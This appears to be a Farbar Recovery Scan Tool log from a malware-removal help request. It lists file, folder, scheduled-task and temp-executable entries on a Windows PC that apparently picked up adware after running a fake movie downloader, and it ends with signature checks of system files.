2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
2016-01-09 16:33 - 2016-01-10 16:09 - 00000352 ____H C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job
2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-09 16:33 - 2016-01-09 20:15 - 00000000 ____D C:\Program Files\Sound+
2016-01-09 16:33 - 2016-01-09 16:33 - 00003360 _____ C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ
2016-01-09 16:33 - 2016-01-09 16:33 - 00002854 _____ C:\WINDOWS\System32\Tasks\LSNHDG1
2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
2016-01-09 16:32 - 2016-01-09 16:32 - 00041472 _____ C:\Users\owner\AppData\Local\Donelectronics.dat
2016-01-09 16:32 - 2016-01-09 16:32 - 00028160 _____ C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 00000187 _____ C:\Users\owner\AppData\Local\Donelectronics.exe.config
2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
2016-01-09 16:31 - 2016-01-10 16:08 - 00000000 ____D C:\ProgramData\ApplicationHosting
2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ____D C:\Program Files\amztab
2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
2016-01-07 07:28 - 2016-01-10 16:10 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump
 
==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
2016-01-10 18:06 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-10 18:06 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
2016-01-10 16:15 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
2016-01-10 16:15 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
2016-01-10 16:15 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-10 16:15 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-10 16:14 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
2016-01-10 16:10 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
2016-01-10 16:10 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
2016-01-10 16:09 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-10 16:09 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-10 15:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-06 00:14 - 2015-04-21 19:15 - 00000291 _____ C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

==================== Files in the root of some directories =======

2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Files to move or delete:
====================
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


Some files in TEMP:
====================
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
C:\Users\owner\AppData\Local\Temp\amzngtb.exe
C:\Users\owner\AppData\Local\Temp\avg6A34.exe
C:\Users\owner\AppData\Local\Temp\avgE955.exe
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
C:\Users\owner\AppData\Local\Temp\nsz1850.exe
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
C:\Users\owner\AppData\Local\Temp\setup_766.exe
C:\Users\owner\AppData\Local\Temp\SpOrder.dll
C:\Users\owner\AppData\Local\Temp\TranDex.exe
C:\Users\owner\AppData\Local\Temp\Uninstall.exe
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
C:\Users\owner\AppData\Local\Temp\Vivafind.exe
C:\Users\owner\AppData\Local\Temp\Voldom.exe
C:\Users\owner\AppData\Local\Temp\widgett.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

C:\WINDOWS\SysWOW64\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-03 06:38

==================== End of FRST.txt ============================
 
Back